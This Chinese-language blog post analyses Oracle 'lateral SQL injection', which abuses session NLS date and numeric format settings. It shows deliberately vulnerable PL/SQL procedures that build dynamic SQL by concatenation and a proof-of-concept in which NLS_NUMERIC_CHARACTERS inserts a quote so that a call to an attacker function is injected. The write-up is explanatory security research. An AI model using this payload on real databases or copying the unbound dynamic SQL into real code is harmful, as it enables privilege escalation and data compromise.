ORACLE LATERAL-SQL-INJECTION 个人见解

原PAPER地址:http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf           author : kj021320          team :  I.S.T.O            最近忙啊忙啊的,今天终于有点点时间抽出来看看技术文章了,最近国外又出了关于新型ORA注入技术的PAPER,赶紧测试,主要是出现在SQL语句字符拼接的时候,DATE类型转换为VARCHAR 以及 NUMBER转换为VARCHAR加入的格式字符出现问题。如果直接执行SQL语句或者参数绑定则不用担心太多,如以下ORACLE存储过程create or replace procedure kjdatepoc(date d)asbegin       insert into kjdatetable values(d);           commit;end;根本不需要担心遭受到SQL新型注入攻击,那么在什么地方会发生DATE 以及 NUMBER的注入攻击呢!?一般都是采用了动态SQL而又不采用参数绑定的语句。例如工程师经常用的DBMS_SQL或者EXECUTE IMMEDIATE看以下存储过程create or replace procedure kjdatepoc(date d)asbegin       execute immediate 'insert into kjdatetable values('|| d ||')';       commit;end;那么遇到以上的存储过程或者函数等,也通过修改SESSION中的NLS_DATE_FORMAT中的值达到SQL注射的目的,老外的PAPER讲解得非常详细了 ,我在这里也不废话。惟独对于 NUMBER类型的注射没有多作讲解 只是简单演示了可以输出单引号!看以下语句ALTER SESSION SET NLS_NUMERIC_CHARACTERS='''.';SELECT to_number(1000.10001,'999999D99999')||'' FROM DUAL;输出一下结果1000'10001只是多了一个单引号,那有什么用呢?乐观的来说!在特定情况下是很有价值的!看以下一个存储过程create or replace procedure NumInjPoc(kjexpnum number,kjexpstr varchar2)isSecStr varchar2(1000);beginSecStr:=replace(kjexpstr,'''','''''');sys.dbms_output.put_line('SELECT * FROM DUAL WHERE ID='||kjexpnum||' and name='''||SecStr||'''');end;内部对varchar类型进行替换了!我们可以进行测试begin       numinjpoc(1000,'''--');end;其输出SQL语句为SELECT * FROM DUAL WHERE ID=1000 and name='''--'单引号被转义掉了那么如果我们结合这个NUMBER类型怎么进行注射呢?ALTER SESSION SET NLS_NUMERIC_CHARACTERS='''.';begin       numinjpoc(TO_NUMBER(0.10001,'999999D99999'),'||kj.exp()--');end;看看输出结果SELECT * FROM DUAL WHERE ID='10001 and name='||kj.exp()--'这样就可以间接的攻击它…在某中程度才来需要ALTER SESSION 配合后,再去攻击系统内部的一些函数或者过程来提升权限。未尝不是一种好的突破思路,但是对于单语句进行SQL注射攻击,以结果为向导的话!这样的方式没多大作为。
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值